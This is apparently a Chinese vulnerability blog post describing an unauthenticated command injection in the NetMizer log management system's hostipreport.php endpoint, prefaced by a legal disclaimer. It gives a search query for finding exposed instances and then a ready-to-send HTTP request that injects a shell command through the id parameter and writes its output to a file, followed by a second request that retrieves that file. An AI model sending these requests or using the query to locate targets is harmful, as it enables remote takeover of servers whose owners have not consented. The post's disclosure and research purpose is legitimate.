免责声明
本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
一、问题描述
NetMizer 日志管理系统hostipreport接口处存在命令执行,未经身份验证的攻击者可通过该问题在服务器端任意执行命令,写入后门,获取服务器权限,进而控制整个web服务器。
二、资产测绘
title="NetMizer 日志管理系统"
三、问题复现
GET /data/yxproject/hostipreport.php?action=showtask&id=;id>test123.txt; HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
访问路径获取文件
GET /data/yxproject/test123.txt HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
1341

被折叠的 条评论
为什么被折叠?



